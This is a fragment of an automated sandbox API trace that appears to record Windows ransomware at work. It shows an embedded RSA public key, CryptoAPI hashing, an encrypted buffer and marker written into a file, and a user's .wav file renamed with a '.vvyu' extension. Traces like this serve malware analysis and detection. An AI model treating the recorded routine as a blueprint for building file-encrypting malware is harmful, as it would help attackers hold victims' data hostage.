KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0195.570] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.570] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.570] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0195.571] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0195.571] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.571] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0195.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0195.572] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0195.572] GetLastError () returned 0x0 [0195.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0195.572] GetLastError () returned 0x0 [0195.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0195.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0195.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0195.572] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0195.572] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0195.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0195.573] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0195.573] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0195.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.573] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0195.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0195.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0195.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x67c0) returned 0x2af5168 [0195.573] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0195.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0195.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e8 [0195.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0195.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae1f48 [0195.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6440 [0195.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae1f90 [0195.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6458 [0195.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6488 [0195.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64e8 [0195.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64a0 [0195.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0195.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0195.574] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0195.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0195.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6488 | out: hHeap=0x2c0000) returned 1 [0195.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64a0 | out: hHeap=0x2c0000) returned 1 [0195.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64e8 | out: hHeap=0x2c0000) returned 1 [0195.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0195.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64e8 [0195.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0195.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae64a0 [0195.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0195.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6488 [0195.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0195.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0195.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0195.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0195.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0195.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0195.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0195.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0195.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64a0 | out: hHeap=0x2c0000) returned 1 [0195.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0195.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6488 | out: hHeap=0x2c0000) returned 1 [0195.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0195.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0195.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64e8 | out: hHeap=0x2c0000) returned 1 [0195.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0195.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0195.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0195.577] GetCurrentThreadId () returned 0x5d8 [0195.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0195.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae84a8 [0195.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0195.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0195.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0195.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0195.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0195.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0195.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.578] GetCurrentThreadId () returned 0x5d8 [0195.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0195.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0195.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0195.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0195.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0195.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0195.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0195.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64e8 [0195.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0195.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0195.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0195.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0195.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0195.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0195.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0195.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0195.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6488 [0195.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0195.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0195.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0195.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0195.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0195.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0195.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0195.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae64a0 [0195.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0195.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0195.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0195.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6470 [0195.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0195.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6500 [0195.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0195.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0195.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0195.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64d0 [0195.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0195.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64b8 [0195.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0195.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6518 [0195.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64b8 | out: hHeap=0x2c0000) returned 1 [0195.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae64b8 [0195.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64d0 | out: hHeap=0x2c0000) returned 1 [0195.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0195.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0195.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0195.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0195.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0195.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6488 | out: hHeap=0x2c0000) returned 1 [0195.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6488 [0195.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0195.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8e0 [0195.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64e8 | out: hHeap=0x2c0000) returned 1 [0195.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0195.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6518 | out: hHeap=0x2c0000) returned 1 [0195.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0195.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0195.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0195.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0195.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0195.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6488 | out: hHeap=0x2c0000) returned 1 [0195.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0195.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0195.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0195.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0195.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0195.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0195.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0195.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0195.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0195.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0195.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0195.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64b8 | out: hHeap=0x2c0000) returned 1 [0195.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0195.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6500 | out: hHeap=0x2c0000) returned 1 [0195.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0195.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64a0 | out: hHeap=0x2c0000) returned 1 [0195.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6470 | out: hHeap=0x2c0000) returned 1 [0195.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0195.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0195.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0195.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6458 | out: hHeap=0x2c0000) returned 1 [0195.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1f90 | out: hHeap=0x2c0000) returned 1 [0195.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8e0 | out: hHeap=0x2c0000) returned 1 [0195.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0195.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0195.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0195.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0195.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0195.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0195.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0195.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0195.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0195.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0195.592] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x67b0, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x67b0, lpOverlapped=0x0) returned 1 [0195.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0195.593] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x67b5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.594] WriteFile (in: hFile=0x584, lpBuffer=0x2ae01d0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae01d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0195.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0195.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e8 [0195.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0195.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0195.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.595] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0195.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.596] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.596] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0195.596] CloseHandle (hObject=0x584) returned 1 [0195.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0195.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x2af3f88 [0195.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0195.598] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\VUGuU0EaHk4ce5o.wav" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\vuguu0eahk4ce5o.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\VUGuU0EaHk4ce5o.wav.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\vuguu0eahk4ce5o.wav.vvyu")) returned 1 [0195.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: 